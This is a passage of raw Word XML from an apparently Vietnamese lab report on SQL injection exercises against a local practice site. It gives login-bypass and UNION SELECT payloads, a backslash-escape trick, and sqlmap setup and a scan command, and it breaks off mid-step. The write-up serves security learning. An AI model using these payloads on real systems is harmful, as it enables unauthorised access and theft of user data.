        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1EB9C63F">
          <v:shape id="Hình ảnh 75" o:spid="_x0000_i1108" type="#_x0000_t75" style="width:390pt;height:219.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId96" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3989B797" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="002A117B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Example 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7354E296" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="002A117B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="003E0059">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">í dụ này là cùng một lỗ hổng như trước đây nhưng Nhà phát triển đã đảm bảo rằng chỉ có một người dùng được trả lại bằng cách giới hạn đầu ra từ cơ sở dữ liệu đến trang. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0059">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Để khai thác nó, bạn sẽ cần phải sử dụng từ khóa Giới hạn SQL, từ khóa này giới hạn số lượng bản ghi mà truy vấn nhận được. </w:t>
      </w:r>
      <w:r w:rsidRPr="003E0059">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>Trong sơ yếu lý lịch, nếu chúng tôi sử dụng ‘hoặc 1 = 1 LIMIT 1 #, truy vấn sẽ chỉ nhận được một bản ghi cho trang và trang sẽ cấp cho bạn quyền truy cập vì chỉ có một bản ghi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A858051" w14:textId="7C97C007" w:rsidR="004653AE" w:rsidRPr="003E0059" w:rsidRDefault="00283404" w:rsidP="002A117B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="5A87AF94">
          <v:shape id="Hình ảnh 76" o:spid="_x0000_i1109" type="#_x0000_t75" style="width:390pt;height:207pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId97" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E986597" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="002A117B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả sau khi sủ dụng cú pháp: </w:t>
      </w:r>
      <w:r w:rsidRPr="005E7368">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>’or 1=1 LIMIT 1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077E143F" w14:textId="2D2EDD5B" w:rsidR="004653AE" w:rsidRPr="00E46243" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="09F8E9D2">
          <v:shape id="Hình ảnh 77" o:spid="_x0000_i1110" type="#_x0000_t75" style="width:468pt;height:118.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId98" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADB65D2"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Example 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDDCDDB"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Trong ví dụ này, nhận thức được rủi ro của việc đưa vào SQL, nhà phát triển đã quyết định chặn các dấu nháy đơn 'bằng cách xóa bất kỳ dấu nháy đơn nào' trong truy vấn. Tuy nhiên, vẫn có một cách để thoát khỏi cú pháp SQL và đưa vào SQL tùy ý.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612F169C" w14:textId="4F1855DB"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Tuy nhiên nếu bạn chèn dấu gạch chéo ngược \, dấu thứ hai 'trong truy vấn (cái được cho là kết thúc chuỗi [tên người dùng] sẽ bị thoát và sẽ bị đóng bởi cái thứ ba (cái được cho là bắt đầu chuỗi [mật khẩu]).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Thử theo ví dụ trên ta được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66834685"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Username= \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55355314"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Password= or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C0FC48" w14:textId="3C25226C"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1454BA2B">
          <v:shape id="Hình ảnh 78" o:spid="_x0000_i1111" type="#_x0000_t75" style="width:390pt;height:219.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId99" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9B4413"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Kết quả ta được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8F78BA" w14:textId="57D3B675"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44A70E13">
          <v:shape id="Hình ảnh 79" o:spid="_x0000_i1112" type="#_x0000_t75" style="width:468pt;height:129pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId100" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="311739BC" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Example 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630EA3AE"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 xml:space="preserve">Trong ví dụ 4 ta nhận thấy không có form để khai thác không </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tin.Vì</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vậy ta tiến hành sql trực tiếp vào thành URL của trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AA47DE" w14:textId="3EFDCC4C"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 xml:space="preserve">Sử dụng câu lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>or 1=1 #</w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ta được thông tin của các user có trong trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7693DA93" w14:textId="1226A19F"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4A831658">
          <v:shape id="Hình ảnh 80" o:spid="_x0000_i1113" type="#_x0000_t75" style="width:410.25pt;height:231pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId101" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21352BD2"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Example 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDED8DB" w14:textId="6F12FF84"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 xml:space="preserve">Ở ví dụ 5 bằng cách sử dụng từ khóa </w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>union select* from users</w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Câu lệnh trên dung để lấy tất cả user có trong users để hiển thị trên màn hình.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Trong thực tế lệnh này khá nguy hiểm đối với các website bị nhiễm SQL Inject.Bằng cách này kẻ tấn công có thể sử dụng thêm một số lệnh SQL khác chiếm quyền quản trị website của bạn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7331FA8F" w14:textId="472BD5F4" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7A0905AE">
          <v:shape id="Hình ảnh 81" o:spid="_x0000_i1114" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId102" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F663835" w14:textId="028204AC"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Có thể thấy với câu lệnh trên ta đã có toàn bộ thông tin các user có trong website.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Với những thông tin này bằng những thủ thuật SQL nâng cao,</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tôi có thể lấy toàn bộ mật khẩu của các user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F87379F"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Example 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316DBDF5"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Đây là một ví dụ khác của SQL injection, nhưng lần này sau từ khóa GROUP BY, khai thác dựa trên liên minh cũng có thể được sử dụng để khai thác loại vấn đề này. Điều đáng mừng là ORDER BY sẽ nằm sau GROUP BY. Vì vậy, ngay cả khi ORDER BY được sử dụng, bạn có thể loại bỏ nó bằng cách sử dụng chú thích SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1D28C2" w14:textId="1605085E"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18126DA5">
          <v:shape id="Hình ảnh 82" o:spid="_x0000_i1115" type="#_x0000_t75" style="width:468pt;height:231pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId103" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB182A1"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Sao khi loại bỏ ta được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ED2065" w14:textId="3AA47898" w:rsidR="004653AE" w:rsidRPr="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="5CC63322">
          <v:shape id="Hình ảnh 83" o:spid="_x0000_i1116" type="#_x0000_t75" style="width:438pt;height:193.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId104" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B00AE96"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Example 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74369FE8"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Trong ví dụ này, hai truy vấn được thực hiện. Truy vấn đầu tiên truy xuất chi tiết người dùng dựa trên id tham số; cái thứ hai sử dụng tên người dùng từ bản ghi được truy xuất trước đó để truy xuất người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA18B4D"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 xml:space="preserve">Để khai thác vấn đề này ở đây tôi sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> để thu thập thông tin trên website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466A0B46" w14:textId="77777777"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Trước tiên tôi sẽ hướng dẫn bạn cài đặt Sqlmap trên hệ điệu hành Windows 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3F5179" w14:textId="4D12DABB" w:rsidR="004653AE" w:rsidRPr="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Truy cập vào trang sqlmap.org để tiến hành download.zip file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31256F04" w14:textId="11EDBB52" w:rsidR="004653AE" w:rsidRPr="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="2EBFDF7E">
          <v:shape id="Hình ảnh 84" o:spid="_x0000_i1117" type="#_x0000_t75" style="width:468pt;height:236.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId105" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0420C133" w14:textId="675E1BE3"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Bước 2: Truy cập vào trang chủ Python, tiến hành tải phiên bản mới nhất dành cho Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A085B6" w14:textId="3A68AA1B"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15BE239B">
          <v:shape id="Hình ảnh 85" o:spid="_x0000_i1118" type="#_x0000_t75" style="width:468.75pt;height:220.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId106" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64367C32"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Bước 3: Tiến hành cài đặt python để thiết lập môi trường cho SQLmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1947655B" w14:textId="6F69E512"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09A08DBB">
          <v:shape id="Hình ảnh 86" o:spid="_x0000_i1119" type="#_x0000_t75" style="width:468pt;height:289.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId107" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="630809B5"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Click chọn tất cả rồi chọn Next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466940B1" w14:textId="7A3C6373"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421D9FB3">
          <v:shape id="Hình ảnh 87" o:spid="_x0000_i1120" type="#_x0000_t75" style="width:403.5pt;height:249.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId108" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE39B45" w14:textId="79C01AD9"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Browse chọn thư mục lưu trữ.</w:t>
      </w:r>
      <w:r w:rsidR="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Chọn install.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC87F29" w14:textId="0F16921A"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39560E6">
          <v:shape id="Hình ảnh 88" o:spid="_x0000_i1121" type="#_x0000_t75" style="width:381pt;height:234.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId109" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C2FA40"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Bước 4: Sau khi quá trình cài đặt hoàn tất. Thêm Python vào các biến môi trường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D071F20" w14:textId="1F6CE512"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Chọn Start menu,</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tìm advanced system settings.</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Chọn View advanced system </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>settings.Tiếp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> theo chọn Properties,click advanced và chọn Evironment Variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6541D91B" w14:textId="751F244C" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="009F47B7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="7916A75A">
          <v:shape id="Hình ảnh 90" o:spid="_x0000_i1122" type="#_x0000_t75" style="width:468pt;height:283.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId110" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A32C069" w14:textId="3B18ABE9"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0E71B425">
          <v:shape id="Hình ảnh 91" o:spid="_x0000_i1123" type="#_x0000_t75" style="width:468pt;height:87pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId111" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="780C3E01"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Bước 5: Xác nhận quá trình cài đặt python đã hoàn tất.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B39F9B" w14:textId="4C5B5FB1"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01A259CB">
          <v:shape id="Hình ảnh 92" o:spid="_x0000_i1124" type="#_x0000_t75" style="width:468pt;height:113.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId112" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFEBEDE"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Bây giờ ta tiến hành cài đặt SQL map sau khi đã có môi trường python trên windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ED4860"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Tiếp theo tiến hành giải nén file zip Sql map ta được file Sql map.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FE834A" w14:textId="6FEFBAF8"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Mở command prompt,</w:t>
      </w:r>
      <w:r w:rsidR="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>trỏ đường dẫn đến thư mục chứa Sqlmap.py.Sử dụng cậu lệnh</w:t>
      </w:r>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>python .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/sqlmap.py</w:t>
      </w:r>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> chờ quá trình cài đặt kết thúc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FF5D64"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Tiếp theo tôi mở sqlmap lên và sử dụng câu lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AE7EF2" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6209E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqlmap </w:t>
      </w:r>
      <w:hyperlink r:id="rId113" w:history="1">
        <w:r w:rsidRPr="00B6209E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://192.168.111.142/sqlinjection/example7/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> .Ta được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F48FDE8" w14:textId="4E8D13FF"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502C4CD9">
          <v:shape id="Hình ảnh 42" o:spid="_x0000_i1125" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId114" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4167A6" w14:textId="2F9C9B83"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Có thể thấy tôi thu thập được rất nhiều thông tin quan trọng của website.</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp theo tôi sử dụng lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="009F47B7">
        <w:rPr>
